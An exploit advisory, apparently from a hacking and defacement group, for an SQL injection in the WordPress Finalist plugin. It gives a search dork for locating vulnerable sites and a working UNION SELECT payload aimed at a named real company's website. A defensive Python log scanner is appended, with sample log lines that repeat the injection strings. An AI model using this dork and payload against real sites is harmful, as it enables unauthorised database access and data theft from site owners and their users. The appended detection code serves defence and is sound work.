The WordPress Finalist third-party plugin suffers from a remote SQL injection vulnerability. Note that this finding houses site-specific data.
++++++++++++++++++++++++++++++++++++++++++
++++++++++++++++++++++++++
++++++++++++++++
# Exploit Title: WordPress Finalist plugin SQL injection vulnerability #
#
# Exploit Author: Ashiyane Digital Security Team#
#
# Home : www.Ashiyane.org#
#
# Vendor Homepage: www.thefaceshop.com.sg#
#
# Software Link: www.wordpress.com#
#
# Tested on: Windows 7#
#
# Dork: inurl:"wp-content/plugins/finalist"#
#
=============================================================
#Location:site/wp-content/plugins/finalist/vote.php?id=[SQL]
#
#
#DEm0:http://www.thefaceshop.com.sg/wp-content/plugins/finalist/vote.php?id=131+union+select+1,2,3,4,@@version,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40--
#
#
++++++++++++++++++++++++++++++++++
======================================
* Greetz to: My Lord Allah
* Sp Tnx To:
Behrooz_Ice,Q7X,Ali_Eagle,Azazel,iman_taktaz,sha2ow,am118,PrinceofHacking,Alireza66,Amirh03in,B4b4K KH4TaR,sil3nt and all
Ashiyane Security [ Researcher Team AND Deface Team ]
* The Last One : My Self, tr0janman
*******
--------------------------------------------
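For defenders checking whether the `vote.php?id=` parameter named in the Location line has been probed, the following is an added example, not part of the original advisory or the plugin's code. It scans web access logs for requests to that path whose `id` value is not a plain integer; the Combined Log Format layout, the function name and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Path taken from the advisory's "Location" line.
VULN_PATH = "/wp-content/plugins/finalist/vote.php"

# Assumed log layout: Apache/nginx Combined Log Format.
REQUEST_RE = re.compile(r'^(?P<ip>\S+) .*?"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')
PLAIN_INT = re.compile(r"[0-9]+")


def suspicious_vote_requests(lines):
    """Return (client_ip, decoded_id) for vote.php hits whose id is not an integer."""
    hits = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue
        url = urlsplit(m.group("target"))
        # endswith() also covers WordPress installed in a subdirectory.
        if not url.path.lower().endswith(VULN_PATH):
            continue
        # parse_qs decodes %xx and '+', so encoded variants are normalised first.
        for value in parse_qs(url.query, keep_blank_values=True).get("id", []):
            if not PLAIN_INT.fullmatch(value):
                hits.append((m.group("ip"), value))
    return hits


# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] '
    '"GET /wp-content/plugins/finalist/vote.php?id=131 HTTP/1.1" 200 512',
    '198.51.100.7 - - [01/Jan/2024:10:00:05 +0000] '
    '"GET /wp-content/plugins/finalist/vote.php?id=131+union+select+1,2,3-- HTTP/1.1" 200 734',
    '198.51.100.7 - - [01/Jan/2024:10:00:09 +0000] '
    '"GET /wp-content/plugins/finalist/vote.php?id=131%20UNION%20SELECT%201 HTTP/1.1" 200 734',
    '203.0.113.4 - - [01/Jan/2024:10:01:00 +0000] '
    '"GET /index.php?id=abc HTTP/1.1" 200 100',
]

if __name__ == "__main__":
    for ip, value in suspicious_vote_requests(SAMPLE_LOG):
        print(f"{ip}\tid={value!r}")
```

Any hit is worth reviewing alongside the response size and status for the same request, since a legitimate vote link only ever carries a numeric `id`.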